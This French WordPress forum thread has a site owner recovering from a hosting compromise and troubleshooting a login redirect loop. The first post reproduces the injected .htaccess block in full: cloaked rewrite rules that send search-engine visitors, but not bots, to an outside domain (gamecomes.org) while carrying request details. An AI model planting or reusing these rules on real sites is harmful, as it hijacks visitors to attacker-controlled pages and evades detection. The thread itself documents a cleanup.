[Résolu] Hack .htaccess : Après réparation, impossible de se connecter !

  • Statut : non résolu
13 sujets de 1 à 13 (sur un total de 13)
  • Auteur
    Messages
  • #498043
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Bonjour,

    Ma configuration WP actuelle 3.2.1
    – Version de WordPress :
    – Version de PHP/MySQL : 5.2.4
    – Thème utilisé :
    – Extensions en place :
    – Nom de l’hebergeur : 1&1
    – Adresse du site : http://www.g-tac.fr

    Problème(s) rencontré(s) :

    Hey, hey, bonsoir à tous,

    Ca fait un moment que je n’ai pas eu le temps de revenir ici ! Mais me revoilà de retour pour de mauvaise nouvelle !

    Suite à une faille de Filezilla lors de la dernière MàJ de WP, un hack s’est produit sur mon espace mutualisé.

    Les .htaccess ont été modifié afin de rendre inactif les sites. De plus, tous les répertoires avaient des .htaccess de présent…

    J’ai donc fait le ménage [n’ayant pas de sauvegarde récente… Déménagement et surmenage pro oblige 😋] à la mano et répertoire par répertoire…

    Pour info le code qui avait été ajouté :

    # exgocgkctswo
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD}   ^GET$
    RewriteCond %{HTTP_REFERER}     ^(http://)?([^/?]*.)?(google.|yahoo.|bing.|msn.|yandex.|ask.|excite.|altavista.|netscape.|aol.|hotbot.|goto.|infoseek.|mamma.|alltheweb.|lycos.|search.|metacrawler.|rambler.|mail.|dogpile.|ya.|/search?).*$   [NC]
    RewriteCond %{HTTP_REFERER}     !^.*(q=cache:).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|AcesExplorer|Amfibi|AmigasOS|apache|appie|AppleSyndication).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|AsksJeeves|asterias|AtrenkosNews|BeOS|BigBlogZoo).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE-Preload|CFNetwork|cococ|Combine|Crawl|curl|Dangershiptop).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest-Vulcan).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|FucksYou|Google).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda-Search|HP-UX).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus-Notes|Lycos|Lynx|Mac_PowerPC).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac_PPC|Macs10|likesMacsOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(os=Mac|P900i|panscient|perl|PlayStation|POE-Component|PrivacyFinder).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Seriess60).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|SoapsClient|Socialmarks|SpheresScout).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Wins9x).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windowss95|Windowss98|WindowssCE|WindowssNTs4).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
    RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
    RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
    RewriteCond %{HTTPS}            ^off$
    RewriteRule ^(.*)$   http://gamecomes.org/cgi-bin/r.cgi?p=10003&i=624cca73&j=333&m=6cb10c9ef49529326edcd6061d2b3bca&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
    # exgocgkctswo

    La majorité des sites sont désormais fonctionnels mais y en a un un qui pose souci !

    Il s’affiche : http://www.g-tac.fr/
    Mais lorsque je souhaite me connecter, c’est impossible : http://www.g-tac.fr/wp-admin, il me redirige vers http://www.g-tac.fr/wp-login.php?redirect_to=http%3A%2F%2Fwww.g-tac.fr%2Fwp-admin%2F&reauth=1

    Je n’ai pas de redirection de prévu à la base !

    Je ne sais plus ou chercher !

    Merci de votre aide 🙂

    ++

    #785103
    Lumiere de Lune
    Participant
    Maître WordPress
    19385 contributions

    Et si tu essayes directement avec l’adresse wp-login.php ? Il te redirige apres l’identification ?

    #785104
    Franck (fge)
    Modérateur
    Maître WordPress
    9583 contributions

    Pour moi l’adresse http://www.g-tac.fr/wp-admin (sans connexion) à l’air de fonctionner ce matin

    #785105
    Guy
    Participant
    Maître WordPress
    14833 contributions

    chez moi, il redirige vers http://www.g-tac.fr/wp-login.php?redirect_to=http%3A%2F%2Fwww.g-tac.fr%2Fwp-admin%2F&reauth=1 , ‘sans connexion non plus bien sur.

    Il existe des topics sur wordpress.org concernant ce problème, pas de solution évidente à priori : http://wordpress.org/support/topic/continuous-redirects-to-wp-adminampreauth1

    #785106
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Bonsoir à tous,

    Merci pour votre intérêt !

    @ Lumière de Lune > Oui, il redirige même sans me logguer mais en chargeant la page !

    @ fge > Pas chez moi :(

    @ Guy > Merci pour le liens, je vais voir !

    @ tous > Après avoir vérifié, cela le fait aussi sur mes autres blogs mais j’arrive bien à me connecter !

    1 – http://www.1001photos.fr
    2 – http://www.blog.persoo.fr
    3 – http://www.hubert.selliah.com

    Je vais tenter de supprimer les plugins et je vous tiens au courant !

    Merci encore,

    Oo

    #785107
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Bonsoir,

    Pour info, ce ne sont pas les plugins…

    Je cherche toujours ! Si quelqu’un a une idée 🙂

    Merci et bonne soirée,

    Oo

    #785108
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Bonjour à tous,

    J’ai beau fouiné mais je ne trouve pas ! Quelqu’un aurait une idée ?

    En vous remerciant,

    ++

    #785109
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Bonjour chouf1,

    Merci pour ce retour.

    En effet, c’est le souci que j’ai eu ! Désormais le souci est que je n’arrive pas à me logguer dans un de mes sites… Alors que les autres fonctionnes…

    J’ai beau remettre une nouvelle version de WP, réinitialiser mon MdP et Identifient… Rien à faire…

    Merci encore,

    ++

    #785110
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Chouf1,

    Je ne suis pas sur que ce soit l’hébergeur qui soit en cause mais bien Filezilla ! Que jamais laissé en marche !

    Mais je vais les alerter également !

    ++

    #785111
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Bonsoir à tous,

    Pour vous tenir informé… J’ai décidé de tout réinstallé pour voir… Enfin presque !

    Après avoir fait une sauvegarde, j’ai tout supprimé du serveur. Et je suis actuellement en train de charger une version propre de WP, la dernière.

    Je ne toucherais pas à la BDD…

    Je vous tiendrais au courant !

    ++

    #785112
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Rien à faire !

    La BDD ?

    Je comprends plus rien !

    Merci de votre aide,

    ++

    #785113
    Guy
    Participant
    Maître WordPress
    14833 contributions

    y a t il un message d’erreur lors de la connexion? en appelant directement wp-login.php quel est le résultat?

    peut être probleme de mot de passe

    (la redirection quand on appelle le répertoire est normale, cela redirige vers le formulaire de connexion)

    #785114
    Oo
    Membre
    Maître WordPress
    2486 contributions

    Bonjour à tous,

    Mon problème est résolu ! Allez comprendre !

    J’ai mis à jour FF, supprimer les cookies et historique, cocher la case “Informer les sites de ne pas me pister” et après plusieurs suppression des cookies et historique… Ca marche !

    Pourtant, j’avais fait la même chose avant mais sans la mise à jour !

    En tous les cas, merci à tous !

    ++

13 sujets de 1 à 13 (sur un total de 13)
  • Vous devez être connecté pour répondre à ce sujet.